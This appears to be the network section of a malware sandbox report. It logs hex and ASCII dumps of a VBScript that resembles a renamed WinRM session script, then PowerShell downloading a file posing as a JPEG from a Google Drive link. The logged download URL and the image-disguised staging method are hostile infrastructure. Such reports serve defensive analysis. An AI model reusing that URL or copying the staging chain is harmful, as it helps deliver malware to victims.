                                                                            2024-10-24 06:52:48 UTC1369INData Raw: 66 37 66 0d 0a 70 72 69 76 61 74 65 20 66 75 6e 63 74 69 6f 6e 20 43 72 65 61 74 65 53 65 73 73 69 6f 6e 28 77 73 6d 61 6e 2c 20 63 6f 6e 53 74 72 2c 20 6f 70 74 44 69 63 2c 20 6d 61 6c 61 6e 64 72 69 6d 29 0d 0a 20 20 20 20 64 69 6d 20 74 75 70 69 61 46 6c 61 67 73 0d 0a 20 20 20 20 64 69 6d 20 63 6f 6e 4f 70 74 20 0d 0a 20 20 20 20 64 69 6d 20 74 75 70 69 61 0d 0a 20 20 20 20 64 69 6d 20 61 75 74 68 56 61 6c 0d 0a 20 20 20 20 64 69 6d 20 65 6e 63 6f 64 69 6e 67 56 61 6c 0d 0a 20 20 20 20 64 69 6d 20 65 6e 63 72 79 70 74 56 61 6c 0d 0a 20 20 20 20 64 69 6d 20 70 77 0d 0a 20 20 20 20 64 69 6d 20 74 6f 75 74 0d 0a 20 20 20 20 27 20 70 72 6f 78 79 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0d 0a 20 20 20 20 64 69 6d 20 70 72 6f 78 79 41 63 63 65 73 73 54 79 70 65
                                                                            Data Ascii: f7fprivate function CreateSession(wsman, conStr, optDic, malandrim) dim tupiaFlags dim conOpt dim tupia dim authVal dim encodingVal dim encryptVal dim pw dim tout ' proxy information dim proxyAccessType
                                                                            2024-10-24 06:52:48 UTC1369INData Raw: 41 72 67 75 6d 65 6e 74 45 78 69 73 74 73 28 4e 50 41 52 41 5f 52 45 4d 4f 54 45 29 2c 20 20 20 20 20 22 54 68 65 20 27 2d 22 20 26 20 4e 50 41 52 41 5f 55 4e 45 4e 43 52 59 50 54 45 44 20 26 20 22 27 20 6f 70 74 69 6f 6e 20 69 73 20 6f 6e 6c 79 20 76 61 6c 69 64 20 77 68 65 6e 20 75 73 65 64 20 77 69 74 68 20 74 68 65 20 27 2d 72 65 6d 6f 74 65 27 20 6f 70 74 69 6f 6e 22 0d 0a 20 20 20 20 20 20 20 20 27 43 20 41 50 49 20 77 69 6c 6c 20 65 6e 73 75 72 65 20 74 68 61 74 20 75 6e 65 6e 63 72 79 70 74 65 64 20 69 73 20 6f 6e 6c 79 20 75 73 65 64 20 77 2f 20 68 74 74 70 0d 0a 20 20 20 20 20 20 20 20 74 75 70 69 61 46 6c 61 67 73 20 3d 20 74 75 70 69 61 46 6c 61 67 73 20 4f 52 20 77 73 6d 61 6e 2e 53 65 73 73 69 6f 6e 46 6c 61 67 4e 6f 45 6e 63 72 79 70 74 69
                                                                            Data Ascii: ArgumentExists(NPARA_REMOTE), "The '-" & NPARA_UNENCRYPTED & "' option is only valid when used with the '-remote' option" 'C API will ensure that unencrypted is only used w/ http tupiaFlags = tupiaFlags OR wsman.SessionFlagNoEncrypti
                                                                            2024-10-24 06:52:48 UTC1236INData Raw: 45 52 4e 41 4d 45 29 2c 20 22 54 68 65 20 27 2d 22 20 26 20 4e 50 41 52 41 5f 55 53 45 52 4e 41 4d 45 20 26 20 22 27 20 6f 70 74 69 6f 6e 20 6d 75 73 74 20 62 65 20 73 70 65 63 69 66 69 65 64 20 66 6f 72 20 27 2d 61 75 74 68 3a 62 61 73 69 63 27 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 41 53 53 45 52 54 42 4f 4f 4c 20 6e 6f 74 20 6f 70 74 44 69 63 2e 41 72 67 75 6d 65 6e 74 45 78 69 73 74 73 28 4e 50 41 52 41 5f 43 45 52 54 29 2c 20 22 54 68 65 20 27 2d 22 20 26 20 4e 50 41 52 41 5f 43 45 52 54 20 26 20 22 27 20 6f 70 74 69 6f 6e 20 69 73 20 6e 6f 74 20 76 61 6c 69 64 20 66 6f 72 20 27 2d 61 75 74 68 3a 62 61 73 69 63 27 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 75 70 69 61 46 6c 61 67 73 20 3d 20 74 75 70 69 61 46 6c 61
                                                                            Data Ascii: ERNAME), "The '-" & NPARA_USERNAME & "' option must be specified for '-auth:basic'" ASSERTBOOL not optDic.ArgumentExists(NPARA_CERT), "The '-" & NPARA_CERT & "' option is not valid for '-auth:basic'" tupiaFlags = tupiaFla
                                                                            2024-10-24 06:52:48 UTC1369INData Raw: 34 30 30 30 0d 0a 74 73 28 4e 50 41 52 41 5f 43 45 52 54 29 2c 20 22 54 68 65 20 27 2d 22 20 26 20 4e 50 41 52 41 5f 43 45 52 54 20 26 20 22 27 20 6f 70 74 69 6f 6e 20 69 73 20 6e 6f 74 20 76 61 6c 69 64 20 66 6f 72 20 27 2d 61 75 74 68 3a 6e 65 67 6f 74 69 61 74 65 27 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 75 70 69 61 46 6c 61 67 73 20 3d 20 74 75 70 69 61 46 6c 61 67 73 20 4f 52 20 77 73 6d 61 6e 2e 53 65 73 73 69 6f 6e 46 6c 61 67 55 73 65 4e 65 67 6f 74 69 61 74 65 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 56 41 4c 5f 43 45 52 54 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 2d 63 65 72 74 69 66 69 63 61 74 65 20 69 73 20 6d 61 6e 64 61 74 6f 72 79 2e 20 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                            Data Ascii: 4000ts(NPARA_CERT), "The '-" & NPARA_CERT & "' option is not valid for '-auth:negotiate'" tupiaFlags = tupiaFlags OR wsman.SessionFlagUseNegotiate case VAL_CERT '-certificate is mandatory.
                                                                            2024-10-24 06:52:48 UTC1369INData Raw: 64 55 73 65 72 6e 61 6d 65 50 61 73 73 77 6f 72 64 20 4f 52 20 77 73 6d 61 6e 2e 53 65 73 73 69 6f 6e 46 6c 61 67 55 73 65 43 72 65 64 53 53 50 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 65 6c 73 65 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 41 53 53 45 52 54 42 4f 4f 4c 20 66 61 6c 73 65 2c 20 22 54 68 65 20 73 70 65 63 69 66 69 65 64 20 27 2d 22 20 26 20 4e 50 41 52 41 5f 41 55 54 48 20 26 20 22 27 20 66 6c 61 67 20 27 22 20 26 20 61 75 74 68 56 61 6c 20 26 20 22 27 20 68 61 73 20 61 6e 20 69 6e 76 61 6c 69 64 20 76 61 6c 75 65 2e 22 0d 0a 20 20 20 20 20 20 20 20 65 6e 64 20 73 65 6c 65 63 74 0d 0a 20 20 20 20 65 6e 64 20 69 66 0d 0a 20 20 20 0d 0a 20 20 20 20 69 66 20 6f 70 74 44 69 63 2e 41 72 67 75 6d 65 6e 74 45 78 69 73
                                                                            Data Ascii: dUsernamePassword OR wsman.SessionFlagUseCredSSP case else ASSERTBOOL false, "The specified '-" & NPARA_AUTH & "' flag '" & authVal & "' has an invalid value." end select end if if optDic.ArgumentExis
                                                                            2024-10-24 06:52:48 UTC1369INData Raw: 75 72 65 20 74 68 69 73 20 69 73 20 6f 6e 6c 79 20 75 73 65 64 20 77 2f 20 68 74 74 70 73 0d 0a 20 20 20 20 20 20 20 20 74 75 70 69 61 46 6c 61 67 73 20 3d 20 74 75 70 69 61 46 6c 61 67 73 20 4f 52 20 77 73 6d 61 6e 2e 53 65 73 73 69 6f 6e 46 6c 61 67 41 6c 6c 6f 77 4e 65 67 6f 74 69 61 74 65 49 6d 70 6c 69 63 69 74 43 72 65 64 65 6e 74 69 61 6c 73 0d 0a 20 20 20 20 65 6e 64 20 69 66 0d 0a 20 20 20 20 0d 0a 20 20 20 20 69 66 20 6f 70 74 44 69 63 2e 41 72 67 75 6d 65 6e 74 45 78 69 73 74 73 28 4e 50 41 52 41 5f 43 45 52 54 29 20 74 68 65 6e 0d 0a 20 20 20 20 20 20 20 20 41 53 53 45 52 54 42 4f 4f 4c 20 6e 6f 74 20 6f 70 74 44 69 63 2e 41 72 67 75 6d 65 6e 74 45 78 69 73 74 73 28 4e 50 41 52 41 5f 55 53 45 52 4e 41 4d 45 29 2c 20 22 54 68 65 20 27 2d 22 20
                                                                            Data Ascii: ure this is only used w/ https tupiaFlags = tupiaFlags OR wsman.SessionFlagAllowNegotiateImplicitCredentials end if if optDic.ArgumentExists(NPARA_CERT) then ASSERTBOOL not optDic.ArgumentExists(NPARA_USERNAME), "The '-"
                                                                            2024-10-24 06:52:48 UTC1369INData Raw: 65 73 73 54 79 70 65 20 3d 20 63 6f 6e 4f 70 74 2e 50 72 6f 78 79 49 45 43 6f 6e 66 69 67 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 56 41 4c 5f 50 52 4f 58 59 5f 57 49 4e 48 54 54 50 5f 43 4f 4e 46 49 47 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 72 6f 78 79 41 63 63 65 73 73 54 79 70 65 20 3d 20 63 6f 6e 4f 70 74 2e 50 72 6f 78 79 57 69 6e 48 74 74 70 43 6f 6e 66 69 67 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 56 41 4c 5f 50 52 4f 58 59 5f 41 55 54 4f 44 45 54 45 43 54 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 72 6f 78 79 41 63 63 65 73 73 54 79 70 65 20 3d 20 63 6f 6e 4f 70 74 2e 50 72 6f 78 79 41 75 74 6f 44 65 74 65 63 74 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 56 41 4c 5f 50
                                                                            Data Ascii: essType = conOpt.ProxyIEConfig case VAL_PROXY_WINHTTP_CONFIG proxyAccessType = conOpt.ProxyWinHttpConfig case VAL_PROXY_AUTODETECT proxyAccessType = conOpt.ProxyAutoDetect case VAL_P
                                                                            2024-10-24 06:52:48 UTC1369INData Raw: 6e 55 73 65 4e 65 67 6f 74 69 61 74 65 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 65 6c 73 65 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 41 53 53 45 52 54 42 4f 4f 4c 20 66 61 6c 73 65 2c 20 22 54 68 65 20 73 70 65 63 69 66 69 65 64 20 27 2d 22 20 26 20 4e 50 41 52 41 5f 50 52 4f 58 59 41 55 54 48 20 26 20 22 27 20 66 6c 61 67 20 27 22 20 26 20 70 72 6f 78 79 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 4d 65 63 68 61 6e 69 73 6d 56 61 6c 20 26 20 22 27 20 68 61 73 20 61 6e 20 69 6e 76 61 6c 69 64 20 76 61 6c 75 65 2e 22 0d 0a 20 20 20 20 20 20 20 20 65 6e 64 20 73 65 6c 65 63 74 0d 0a 20 20 20 20 65 6e 64 20 69 66 0d 0a 20 20 20 20 69 66 20 6f 70 74 44 69 63 2e 41 72 67 75 6d 65 6e 74 45 78 69 73 74 73 28 4e 50 41 52 41 5f 50 52
                                                                            Data Ascii: nUseNegotiate case else ASSERTBOOL false, "The specified '-" & NPARA_PROXYAUTH & "' flag '" & proxyAuthenticationMechanismVal & "' has an invalid value." end select end if if optDic.ArgumentExists(NPARA_PR
                                                                            2024-10-24 06:52:48 UTC1369INData Raw: 65 6e 73 75 72 65 20 74 68 69 73 20 69 73 20 6f 6e 6c 79 20 75 73 65 64 20 77 2f 20 68 74 74 70 73 0d 0a 20 20 20 20 20 20 20 20 74 75 70 69 61 46 6c 61 67 73 20 3d 20 74 75 70 69 61 46 6c 61 67 73 20 4f 52 20 77 73 6d 61 6e 2e 53 65 73 73 69 6f 6e 46 6c 61 67 53 6b 69 70 43 4e 43 68 65 63 6b 0d 0a 20 20 20 20 65 6e 64 20 69 66 0d 0a 0d 0a 20 20 20 20 69 66 20 6f 70 74 44 69 63 2e 41 72 67 75 6d 65 6e 74 45 78 69 73 74 73 28 4e 50 41 52 41 5f 4e 4f 52 45 56 43 48 4b 29 20 74 68 65 6e 0d 0a 20 20 20 20 20 20 20 20 27 43 20 41 50 49 20 77 69 6c 6c 20 65 6e 73 75 72 65 20 74 68 69 73 20 69 73 20 6f 6e 6c 79 20 75 73 65 64 20 77 2f 20 68 74 74 70 73 0d 0a 20 20 20 20 20 20 20 20 74 75 70 69 61 46 6c 61 67 73 20 3d 20 74 75 70 69 61 46 6c 61 67 73 20 4f 52 20
                                                                            Data Ascii: ensure this is only used w/ https tupiaFlags = tupiaFlags OR wsman.SessionFlagSkipCNCheck end if if optDic.ArgumentExists(NPARA_NOREVCHK) then 'C API will ensure this is only used w/ https tupiaFlags = tupiaFlags OR


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.2249166216.58.206.464433808C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-24 06:52:51 UTC121OUTGET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1
                                                                            Host: drive.google.com
                                                                            Connection: Keep-Alive
                                                                            2024-10-24 06:52:51 UTC1319INHTTP/1.1 303 See Other
                                                                            Content-Type: application/binary
                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                            Pragma: no-cache
                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                            Date: Thu, 24 Oct 2024 06:52:51 GMT
                                                                            Location: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
                                                                            Strict-Transport-Security: max-age=31536000
                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-SmDIEc8JB4qFWNBCH-lwvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                            Server: ESF
                                                                            Content-Length: 0
                                                                            X-XSS-Protection: 0
                                                                            X-Frame-Options: SAMEORIGIN
                                                                            X-Content-Type-Options: nosniff
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.2249167142.250.186.974433808C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-24 06:52:53 UTC139OUTGET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1
                                                                            Host: drive.usercontent.google.com
                                                                            Connection: Keep-Alive
                                                                            2024-10-24 06:52:55 UTC4906INHTTP/1.1 200 OK
                                                                            Content-Type: image/jpeg
                                                                            Content-Security-Policy: sandbox
                                                                            Content-Security-Policy: default-src 'none'
                                                                            Content-Security-Policy: frame-ancestors 'none'
                                                                            X-Content-Security-Policy: sandbox
                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                            Cross-Origin-Embedder-Policy: require-corp
                                                                            Cross-Origin-Resource-Policy: same-site
                                                                            X-Content-Type-Options: nosniff
                                                                            Content-Disposition: attachment; filename="new_image-new.jpg"
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Credentials: false
                                                                            Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                            Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                            Accept-Ranges: bytes
                                                                            Content-Length: 2239109
                                                                            Last-Modified: Mon, 21 Oct 2024 13:42:20 GMT
                                                                            X-GUploader-UploadID: AHmUCY0WpLIzED1mPyLj6-eZOLfhYMOup03X0hw_KdZPqGxlxUWqauA8ZinN6FVmr4bMOZ9S8pfWx65vdQ
                                                                            Date: Thu, 24 Oct 2024 06:52:55 GMT
                                                                            Expires: Thu, 24 Oct 2024 06:52:55 GMT
                                                                            Cache-Control: private, max-age=0
                                                                            X-Goog-Hash: crc32c=WqxmdA==
                                                                            Server: UploadServer
                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                            Connection: close
                                                                            2024-10-24 06:52:55 UTC4906INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                            Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                            2024-10-24 06:52:55 UTC4884INData Raw: 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c a8 45 2e de 2f b9 cd 04 62 f1 19 03 ed 55 b5 34 6c 13 99 53 48 aa 43 28 23 68 01 89 e7 9c 98 27 46 81 d1 49 00 1d c6 fb 9c 07 6f 7c 8a 24 76 64 ec a4 5e 15 62 d3 c0 8c e5 e5 24 03 e9 02 c5 62 1a 6d 62 bb 00 cc 14 ad 81 78 71 36 e4 61 be af 8c 0c ad 42 99 26 76 51 44 9a 0a 16 b8 c5 99 19 0d 32 90 7e 23 35 a4 11 b3 15 27 e2 0f 4b e3 17 d4 ed 10 80 24 dc 4f 40 70 33 eb
                                                                            Data Ascii: 8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^}E./bU4lSHC(#h'FIo|$vd^b$bmbxq6aB&vQD2~#5'K$O@p3
                                                                            2024-10-24 06:52:55 UTC1378INData Raw: f9 18 1a 03 c4 23 6b 26 3e a2 b2 24 d6 c3 22 14 64 b1 ef ed 88 84 29 76 39 ca bd 12 08 bf cb 00 a4 c2 14 98 d5 83 0e 84 9c 9d 36 a5 e0 63 42 c9 e7 9c 18 e0 82 47 07 2c 14 16 14 d5 f0 ac 0d 24 f1 5d a4 03 18 2f ee 33 6b 47 ad d3 3e 98 4d 26 91 19 99 d9 77 32 b9 ae 9e a2 43 00 33 ca 86 52 de ae 08 03 9c 29 21 94 85 5e 2a b8 e3 eb d7 e5 81 e9 07 8b 40 da 67 d5 0f 0e d3 10 ac 29 77 3d 76 04 fe 3e c4 af e7 f0 39 da 6f 1b d3 6a 1c ef d0 c2 18 ad 85 4d ec c4 fc 8b f3 f4 ed ce 61 40 cf 14 91 b0 04 a8 24 15 27 f8 4f 0c 3f 2c a2 b4 b0 b9 da 40 ba b0 c0 30 ef 55 63 b7 be 06 9c de 2d 13 9a 1a 38 a3 b3 cb 29 6b 35 f0 2c 72 ad e3 50 00 36 f8 74 25 bd ed f9 ff 00 c5 99 f3 17 91 43 33 12 d4 7f 11 ba e7 b6 2e 18 b2 d8 8c 00 bf e2 16 0e 06 be b7 c5 22 62 a9 1e 8e 28 db 68
                                                                            Data Ascii: #k&>$"d)v96cBG,$]/3kG>M&w2C3R)!^*@g)w=v>9ojMa@$'O?,@0Uc-8)k5,rP6t%C3."b(h
                                                                            2024-10-24 06:52:55 UTC1378INData Raw: e3 0e ab 40 03 c5 70 31 00 f6 a4 48 6a fa 1d b8 cc 2f e7 00 a5 a9 94 58 f8 8c 0e 24 5d 61 13 77 6b 03 e1 92 17 af 1f 8b 8b c9 29 b5 49 1f 2c 00 18 b9 2d 6c 4f c7 28 47 15 75 86 08 42 f2 6b 2a c9 e9 3e bc 08 42 03 02 af 44 f7 ba cd 6f 04 d6 47 a2 d4 4a f3 be d5 70 2b 82 6d be 99 8e 14 03 f8 ac e1 01 2b d3 ad 7b d6 07 a4 f1 bd 8b 0a ea 53 53 2c 72 6d 0a b1 86 20 1e 7a fe 59 89 11 d7 6a 17 64 26 79 1a e8 90 cc 76 df c7 a0 ca b3 a3 43 24 b3 6a 7f 7b c0 45 ae 4d 77 bf 6c 67 c3 5e 72 fb 20 75 60 80 ca 55 ba 13 44 1f e7 81 53 a2 f1 b4 86 49 8c b3 20 4e 4a 89 da c8 fa 1c 57 45 ac f1 1d 44 a4 c5 aa 76 65 e4 2b 4a 7a 7d 78 cf 68 ed fb a6 b5 05 45 92 08 be 9c e7 90 d7 c4 9a 5f 11 d4 84 04 02 4b 75 e3 91 ed 81 a1 a2 fb 43 18 3e 5e b2 44 0f c8 de 08 02 fe 20 74 cd 5d
                                                                            Data Ascii: @p1Hj/X$]awk)I,-lO(GuBk*>BDoGJp+m+{SS,rm zYjd&yvC$j{EMwlg^r u`UDSI NJWEDve+Jz}xhE_KuC>^D t]
                                                                            2024-10-24 06:52:55 UTC1378INData Raw: 47 6c 3a 1f ae 27 36 92 58 80 97 69 00 1b 35 81 30 05 58 83 ca 01 00 f7 cf b2 7e cf b4 a9 3f ec fb 47 a6 9e 36 97 4f a8 fb 42 11 94 77 56 88 29 e7 b7 cf b6 7c 6a 58 19 c8 f2 eb 6d 73 66 8f 39 fa 1b f6 20 88 bf 60 e7 77 65 21 f5 ce 36 b3 71 7b 50 00 47 c4 d0 fa e0 7c f3 ec 86 96 0d 24 df 69 61 de cc 9f 72 5f 4c 4e 18 b2 99 62 23 d4 78 ee 01 6e c3 a6 0b f6 84 1a 2f da f4 cd 33 8d 41 69 34 c7 72 a8 51 b7 62 71 ed d3 bf 7b be 3a 66 ef d9 08 53 67 da 44 1a 69 62 f1 18 b4 4e 93 ab 23 16 45 43 10 29 60 05 03 d2 d4 a0 0a af 86 64 7d b5 d6 e9 b5 bf b4 81 3b 23 16 94 69 24 01 db 90 1a 28 d8 0e bf 1c 0d 1f da cc fe 54 1f 66 56 3d cb 1f fb 35 76 ad 81 43 8f fa 67 cc c3 ea a2 5b d3 06 21 bd 54 05 fe b9 f5 2f da 8c 48 e3 ec f0 92 2d 81 7c 35 00 66 61 46 b6 f4 e7 3c 34
                                                                            Data Ascii: Gl:'6Xi50X~?G6OBwV)|jXmsf9 `we!6q{PG|$iar_LNb#xn/3Ai4rQbq{:fSgDibN#EC)`d};#i$(TfV=5vCg[!T/H-|5faF<4
                                                                            2024-10-24 06:52:55 UTC1378INData Raw: 91 cf 18 c3 29 58 5a 9c d9 3e 9f 96 1e 08 8c b0 82 dc af 42 47 38 19 e1 37 37 ac 6e 1e f8 64 2c ea 50 8b 5a e2 86 72 43 20 d6 98 ca 91 10 e6 f1 98 e2 02 56 0a 59 42 8b 23 df 01 78 b4 e9 01 ad a6 db b0 c3 47 a2 56 90 52 30 0d d6 fb 64 88 77 4d bc c8 dc 9e 06 3a 6d 23 01 59 b7 11 d7 02 87 46 9a 6b 23 93 d3 e9 81 56 57 0c 03 58 06 a8 8e 70 da 98 8b 4d 13 09 58 9a a2 07 f3 c4 91 36 ea 25 46 91 89 bf 4f 15 81 05 48 73 66 fe 99 59 d0 32 6d 65 e4 64 32 32 cc 41 73 f0 bc ba 5b 0d 92 1b 61 d0 d6 02 fa 7d 3a 39 3e 9f 52 f4 38 dc 6b 21 43 bb a8 e9 95 8c 04 52 43 10 df 2c 32 12 50 6d 66 2c 7a fc 30 2f 06 8d a6 25 a4 34 3b 58 c8 96 22 d1 f4 52 cb c0 ac d4 44 56 45 f2 d8 8f 46 d3 f1 f8 e6 63 11 a7 d4 37 3c 01 54 7b e0 0e 5d b1 bd 58 06 85 71 f0 c3 94 4f ba 05 25 43 37
                                                                            Data Ascii: )XZ>BG877nd,PZrC VYB#xGVR0dwM:m#YFk#VWXpMX6%FOHsfY2med22As[a}:9>R8k!CRC,2Pmf,z0/%4;X"RDVEFc7<T{]XqO%C7
                                                                            2024-10-24 06:52:55 UTC1378INData Raw: ff 00 ab 01 32 29 b9 26 8f b6 16 02 34 ee 25 08 c5 87 2a bb c8 03 e7 44 1f d7 0f f7 49 0c 77 be 02 4f ff 00 6f 4f fd 59 0d a4 95 63 16 d0 90 be d3 23 7e 81 b0 1a 86 59 f5 09 23 43 24 e1 4d 1d cd 2b 11 d0 58 15 c0 b3 fe 20 46 44 5a 83 3b 14 59 a6 89 55 50 bb b4 cc 6c d8 56 ef d3 93 f9 7b 62 09 a7 96 48 77 a3 42 01 3c dc aa a4 8f 88 2c 32 1f 49 22 a9 25 a1 20 2e ea 12 27 4f a3 73 80 ea 99 bc a5 f3 1a 44 2e 18 28 69 18 f2 0a f5 00 93 5c 9e dd 33 33 5c 85 67 60 58 b1 e2 d9 9a cf f7 af 9e 73 bb 36 9c 21 24 aa 12 47 3c 73 5f 9e 2c 78 04 0b a3 c9 27 02 83 83 9a be 16 e9 1c 52 33 90 29 81 e7 e5 99 4a 2c e6 e7 81 e9 61 d4 45 28 96 23 21 0c 36 fb 0c 0d 48 75 9a 52 a1 69 48 6f c3 75 57 99 1a f9 8f dd 9d 23 da c0 b7 2c 3a e6 e4 de 1f 02 10 91 32 83 b4 b0 b4 04 03 5d
                                                                            Data Ascii: 2)&4%*DIwOoOYc#~Y#C$M+X FDZ;YUPlV{bHwB<,2I"% .'OsD.(i\33\g`Xs6!$G<s_,x'R3)J,aE(#!6HuRiHouW#,:2]
                                                                            2024-10-24 06:52:55 UTC1378INData Raw: 15 5d bf a6 09 d8 19 02 81 47 df 03 d0 7d 9e 56 6d 0b d3 6d 01 ec 1f a5 62 bf 68 55 9b 57 a7 0d d7 6f 1f 1f 56 5b c2 35 03 45 0c 9e 71 db 16 e5 36 db af 9b 1c 7e 78 2f 13 d4 47 ac d4 c6 da 76 de 11 4a 9d bb ab df db 03 d0 1d eb a5 2a 59 98 85 6f c5 db e1 9e 7f ec d0 65 9a 72 39 f4 0f e7 9a e7 59 12 e9 49 97 74 67 98 d4 10 c6 cd 7b 7d 33 27 c1 b7 e9 27 73 22 32 ab a8 16 55 b9 eb d0 56 03 3e 3f a7 f3 60 13 85 f5 44 68 ff 00 ba 7f eb 97 d0 f8 ac 6b e1 db a4 3c c4 84 f4 27 75 76 c7 27 96 07 86 45 91 c4 6a ca 08 69 01 0a 77 03 c0 be a7 8c f1 c2 45 86 52 a5 4b c5 7c 7a a8 10 3e 38 1e 8f 45 71 81 23 bb 7d e2 57 0c ea 1e ec 37 22 97 bf 40 0d f6 27 0b aa f1 6d 1f 87 c6 22 0e 24 91 46 d1 1c 7f c2 45 8e 4f 6e 95 99 7b 3c 5f c5 90 05 8c 41 a6 6b 62 45 20 6b b2 49 fe
                                                                            Data Ascii: ]G}VmmbhUWoV[5Eq6~x/GvJ*Yoer9YItg{}3''s"2UV>?`Dhk<'uv'EjiwERK|z>8Eq#}W7"@'m"$FEOn{<_AkbE kI
